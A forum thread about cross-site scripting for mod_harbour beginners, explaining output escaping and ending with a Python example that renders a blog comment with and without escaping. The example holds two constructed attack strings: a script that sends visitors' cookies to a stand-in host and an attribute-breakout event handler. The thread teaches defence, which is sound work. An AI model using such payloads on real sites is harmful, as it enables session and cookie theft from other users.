cross-site scripting

mod_harbour is an Apache module that allows you to run PRGs directly on the web.
Otto
Posts: 4470
Joined: Fri Oct 07, 2005 7:07 pm

cross-site scripting

Post by Otto »

After yesterday's Skype session I discussed some security aspects with Andreu.
Andreu helped me understand some risks better. I am focused on the firewall, but it seems we must also be careful in programming.

but we have to give a security concept to mod harbour starters

Andreu, 19:43
to be fair, I think for starting on the web it's far better to focus on things like XSS

what is XSS?

cross-site scripting

it's a web security attack that goes like this:

on your website, you have an input for the user that will be visible to everyone – for example, a comment form on a blog post

and the server-side code used to store and display that comment doesn't escape the input

some malicious user could add input with scripts in the HTML, which could publish private data like cookies

you'd have to escape the input on the server so that it can't be rendered as a script when it's displayed

it's not an attack against the server, but against fellow users of the service

nowadays the web platform offers you tools so that you can block scripts without actually having to escape the input on the server side

but while some of those are good, if you ask me the complete package is more trouble than just escaping every input
********************************************************************
mod harbour - Let's conquer the Web
modharbour.org

********************************************************************

Re: cross-site scripting

Post by Otto »

In order to write a < sign in HTML that doesn't start a tag, you write it &lt;
Same with > and &gt;
If you're writing code to render an attribute in a tag, you can escape a quote with &apos; (single quote) or &quot; (double quote)
Just that should be enough
Replace those in any input you're printing
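The blog-comment scenario from the first post and the escape table from the second, as one added example. This is not code from the original posts or from mod_harbour, and it is written in Python rather than Harbour; the comment renderer, the attacker host name and the two payloads are constructed for the illustration. It renders the same stored comment without and with output escaping, for both an HTML text node and a quoted attribute, and cross-checks the hand-written escape table against Python's standard library escaper. One addition to the thread's list: `&` is escaped too, because a raw `&` followed by a name or number would otherwise be re-read by the browser as an entity.

```python
# Added example (not from the original post nor from mod_harbour), written in
# Python rather than Harbour. It shows a stored blog comment rendered without
# and with output escaping, for an HTML text node and a quoted attribute.
import html  # stdlib; used only to cross-check the hand-written escaper

# Escape table for HTML text and quoted-attribute contexts. '&' is replaced
# first so the '&' introduced by the other replacements is not escaped again.
# The thread lists <, > and the quotes; '&' is added here because a raw '&'
# followed by a name or number would be re-read as an entity.
_HTML_ESCAPES = [
    ("&", "&amp;"),
    ("<", "&lt;"),
    (">", "&gt;"),
    ('"', "&quot;"),
    ("'", "&#x27;"),  # &apos; is not an HTML 4 entity; the numeric form works everywhere
]


def html_escape(text: str) -> str:
    """Return text that is safe to interpolate into HTML text or a quoted attribute."""
    for raw, escaped in _HTML_ESCAPES:
        text = text.replace(raw, escaped)
    return text


def matches_stdlib(text: str) -> bool:
    """Cross-check: the table above produces exactly what html.escape does."""
    return html_escape(text) == html.escape(text, quote=True)


def render_comment_unsafe(author: str, body: str) -> str:
    """The vulnerable pattern: stored input pasted straight into the page."""
    return f'<li data-author="{author}">{body}</li>'


def render_comment_safe(author: str, body: str) -> str:
    """The fix: escape once, at output time, in both contexts."""
    return f'<li data-author="{html_escape(author)}">{html_escape(body)}</li>'


def render_comment_page(comments) -> str:
    """Render stored (raw) comments. Store raw, escape at output: escaping at
    storage time instead would double-escape anything edited and re-saved."""
    return "<ul>" + "".join(render_comment_safe(a, b) for a, b in comments) + "</ul>"


# Constructed attacker input (hypothetical host name), not captured data.
# A text-node payload: a script that ships the viewer's cookies elsewhere.
COOKIE_THEFT_PAYLOAD = "<script>new Image().src='//attacker.example/?c='+document.cookie</script>"
# An attribute payload: closes data-author="..." and injects an event handler,
# so it needs no < or > at all.
ATTR_BREAKOUT_PAYLOAD = '" onmouseover="alert(document.cookie)'


def quote_count(markup: str) -> int:
    """Number of raw double quotes; a broken-out attribute adds two extra."""
    return markup.count('"')


if __name__ == "__main__":
    for render in (render_comment_unsafe, render_comment_safe):
        print(render.__name__)
        print("  ", render("alice", COOKIE_THEFT_PAYLOAD))
        print("  ", render(ATTR_BREAKOUT_PAYLOAD, "hello"))
```

Two caveats a practitioner will want. First, this table is only correct for HTML text and quoted attribute values; a value placed inside a `<script>` block, an inline event handler, a URL, or an unquoted attribute needs context-specific encoding, or better, should not be placed there at all. Second, the browser-side tools Andreu mentions (a Content Security Policy, for instance) are defence in depth on top of output escaping, not a substitute for it.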